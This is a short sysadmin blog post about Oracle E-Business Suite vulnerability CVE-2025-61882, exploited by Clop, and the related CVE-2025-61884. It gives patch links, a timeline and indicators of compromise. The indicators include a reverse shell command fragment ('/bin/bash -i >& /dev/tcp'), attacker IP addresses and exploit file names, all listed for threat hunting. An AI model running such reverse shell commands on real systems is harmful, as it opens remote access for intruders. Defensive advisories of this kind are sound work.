Dear All,
In this post i am sharing details related to Oracle E-Business Suite Security Alert addresses vulnerability R12.2 versions which are reported recently in this year 2025.
Vulnerability in EBS R12.2 versions.
CVE-2025-61882 :::
The vulnerability lies in the BI Publisher Integration component of Oracle’s Concurrent Processing module, part of EBS versions 12.2.3 through 12.2.14. It allows unauthenticated attackers to send specially crafted HTTP requests that lead to remote code execution on the affected server.
Critical unauthenticated remote code
execution (RCE) in Oracle E-Business Suite (EBS)
> Actively exploited in Clop-led
data theft and extortion attacks
> Exploit and Oracle source code
leaked publicly
> Emergency
patch released
Oracle has released an emergency patch for a
critical zero-day vulnerability in Oracle E-Business Suite, tracked as
CVE-2025-61882. The flaw, with a CVSS score of 9.8, allows attackers to execute
arbitrary code remotely without authentication.
Reports from Oracle, Mandiant, and independent researchers confirm the vulnerability has been actively exploited in Clop ransomware (Ransomware is a type of malicious software (malware) ) group campaigns, leading to large-scale data theft and extortion. Public indicators of compromise (IOCs) now match exploit code that leaked on Telegram, confirming this is the same vulnerability used in recent attacks.
https://support.oracle.com/epmos/faces/DocumentDisplay?_afrLoop=274578431489086&id=3106344.1&_afrWindowMode=0&_adf.ctrl-state=1a0ce4gyc8_53
EBS R12.2 Environment :
EBS R12.1.3 Environment :
CVE-2025-61884 ::
======== ====
https://support.oracle.com/epmos/faces/DocumentDisplay?_afrLoop=274764861518353&id=3107176.1&_afrWindowMode=0&_adf.ctrl-state=1a0ce4gyc8_102
post 884 fixup we may see this issue , you can apply the given patch to fix that issue.
Recommended actions
- Patch
immediately: Apply Oracle’s Security Alert update for CVE-2025-61882. Ensure the
October 2025 Critical Patch Update is installed first.
- Hunt
for the following IOCs: Reverse shell commands (/bin/bash -i >&
/dev/tcp), unexpected child processes from the EBS Java service, the IPs
200.107.207.26 and 185.181.60.11, and presence of files exp.py, server.py,
or oracle_ebs_nday_exploit*.zip.
- Review
access exposure: Identify
any externally accessible EBS instances or outdated versions.
- Increase runtime visibility: Monitor for process and
library behavior within application workloads, not just endpoints.
- June
2025: Dark Web posts advertise an Oracle EBS zero-day exploit for sale
(~$70,000).
- August
2025: Clop begins an extortion campaign targeting EBS servers across
multiple organizations.
- October
4, 2025: Oracle publishes a Security Alert for CVE-2025-61882 and releases
an emergency patch.
- October
5, 2025: Mandiant confirms Clop leveraged both previously patched July
vulnerabilities and this new zero-day.
- October 6, 2025: Exploit archive and partial
Oracle source code leaked by a group calling itself Scattered Lapsus$
Hunters.
Importent dates :
Thanks,
Srini
